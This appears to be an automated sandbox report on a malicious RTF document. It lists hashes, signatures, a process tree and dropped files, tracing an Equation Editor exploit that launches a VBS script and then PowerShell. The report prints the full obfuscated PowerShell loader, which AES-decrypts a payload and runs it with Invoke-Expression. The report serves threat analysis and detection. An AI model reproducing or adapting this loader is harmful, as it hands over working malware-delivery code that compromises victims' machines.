Analysis
Max time kernel: 118s
Max time network: 118s
Platform: windows7_x64
Resource: win7-20240705-en
Resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
Submitted: 20-07-2024 09:50
Static task: static1
Behavioral task: behavioral1
  Sample: 5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2.rtf
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: 5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2.rtf
  Resource: win10v2004-20240709-en
General
Target: 5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2.rtf
Size: 90KB
MD5: e677d8183d89a410a3ce59db5a2722d3
SHA1: 969255020b8e5b9cf16ffa6dd7c8f931e7b68ce7
SHA256: 5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2
SHA512: 8f7369c3de05953613c246a1312a6ccfb6c416e458ddd55efdfb96c0ef569832aea51a52527fbfd5f7c36e1613c59358c425e5d8cdbf51d5bf4fb63a2bc16cc5
SSDEEP: 384:Vgn/TJl/8FdlK+gqigv0C7xAlEM5jUbTMbyi9thdIhFRi2mnk0PKk6Ut6jvWdlKv:YuF22+iM5jZbyShdIjFJu2
Malware Config
Signatures
- Blocklisted process makes network request (7 IoCs)
  Processes: EQNEDT32.EXE, WScript.exe, powershell.exe
  flow  pid   process
  4     2516  EQNEDT32.EXE
  7     2832  WScript.exe
  9     2832  WScript.exe
  11    2668  powershell.exe
  12    2668  powershell.exe
  13    2668  powershell.exe
  14    2668  powershell.exe
- Drops file in System32 directory (1 IoC)
  Processes: powershell.exe
  description: File opened for modification
  ioc: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  process: powershell.exe
- Drops file in Windows directory (1 IoC)
  Processes: WINWORD.EXE
  description: File opened for modification
  ioc: C:\Windows\Debug\WIA\wiatrace.log
  process: WINWORD.EXE
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Office loads VBA resources, possible macro or embedded object present
- Launches Equation Editor (1 TTP, 1 IoC)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: WINWORD.EXE
  pid   process
  2444  WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe
  pid   process
  2668  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description              pid   process
  Token: SeDebugPrivilege  2668  powershell.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes: WINWORD.EXE
  pid   process
  2444  WINWORD.EXE
  2444  WINWORD.EXE
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes: EQNEDT32.EXE, WScript.exe, WINWORD.EXE
  description                       pid   process       target process
  PID 2516 wrote to memory of 2832  2516  EQNEDT32.EXE  WScript.exe
  PID 2516 wrote to memory of 2832  2516  EQNEDT32.EXE  WScript.exe
  PID 2516 wrote to memory of 2832  2516  EQNEDT32.EXE  WScript.exe
  PID 2516 wrote to memory of 2832  2516  EQNEDT32.EXE  WScript.exe
  PID 2832 wrote to memory of 2668  2832  WScript.exe   powershell.exe
  PID 2832 wrote to memory of 2668  2832  WScript.exe   powershell.exe
  PID 2832 wrote to memory of 2668  2832  WScript.exe   powershell.exe
  PID 2832 wrote to memory of 2668  2832  WScript.exe   powershell.exe
  PID 2444 wrote to memory of 2772  2444  WINWORD.EXE   splwow64.exe
  PID 2444 wrote to memory of 2772  2444  WINWORD.EXE   splwow64.exe
  PID 2444 wrote to memory of 2772  2444  WINWORD.EXE   splwow64.exe
  PID 2444 wrote to memory of 2772  2444  WINWORD.EXE   splwow64.exe
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2.rtf"
  Signatures:
    - Drops file in Windows directory
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  - C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
- C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Signatures:
    - Blocklisted process makes network request
    - Launches Equation Editor
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\butterburnverysweetgirleate.vBS"
    Signatures:
      - Blocklisted process makes network request
      - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI49958097433743076509724959814142CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
      Signatures:
        - Blocklisted process makes network request
        - Drops file in System32 directory
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1VX38S3F\paste1[1].txt
  Filesize: 156B
  MD5: ad6c37ef980373e9bcbd14810fad34bc
  SHA1: 9c061a1b3608b7c7f1db7cd06c8246913ee11bda
  SHA256: ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c
  SHA512: 30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f
- C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
  Filesize: 19KB
  MD5: fa2e9509d2e34b1ad4246bb165e5ff58
  SHA1: c4f1c6f094b89100d681e5d2d4ea2bc805ef7765
  SHA256: b406ca3dbab64096e692b58b794bf3759f8bf18a8da2e5b279340df0672ad36e
  SHA512: cbbe3d29656ba2aeec427f4f8fe23256997962e78e50a4223e2e104c44b29eae489c34eb5a5aa9b80d3ab88c82db92dc905df8edd253289a12313768fe8dc57c
- C:\Users\Admin\AppData\Roaming\butterburnverysweetgirleate.vBS
  Filesize: 123KB
  MD5: 612b79418bc9dee5e9bf503df55a245c
  SHA1: 8211185d8e6f152a269325a6cb30c361fcbb60b3
  SHA256: 154365daa42baad94fe2c6de17859212e407767de8f9e8e12c69b9623b63a7a0
  SHA512: 05ef1aebdd3b9f2255f7d198c18d498e5b021f89444a8679a84fc6d01e61720e1af7216444231aff52ea3811fb12715f1ac556dd7347346f9a2c12eb27a5fb02
- memory/2444-0-0x000000002FA21000-0x000000002FA22000-memory.dmp
  Filesize: 4KB
- memory/2444-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
  Filesize: 64KB
- memory/2444-2-0x00000000713BD000-0x00000000713C8000-memory.dmp
  Filesize: 44KB
- memory/2444-38-0x00000000713BD000-0x00000000713C8000-memory.dmp
  Filesize: 44KB
- memory/2444-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
  Filesize: 64KB
- memory/2668-36-0x0000000005540000-0x0000000005592000-memory.dmp
  Filesize: 328KB
- memory/2668-37-0x00000000028A0000-0x00000000028B5000-memory.dmp
  Filesize: 84KB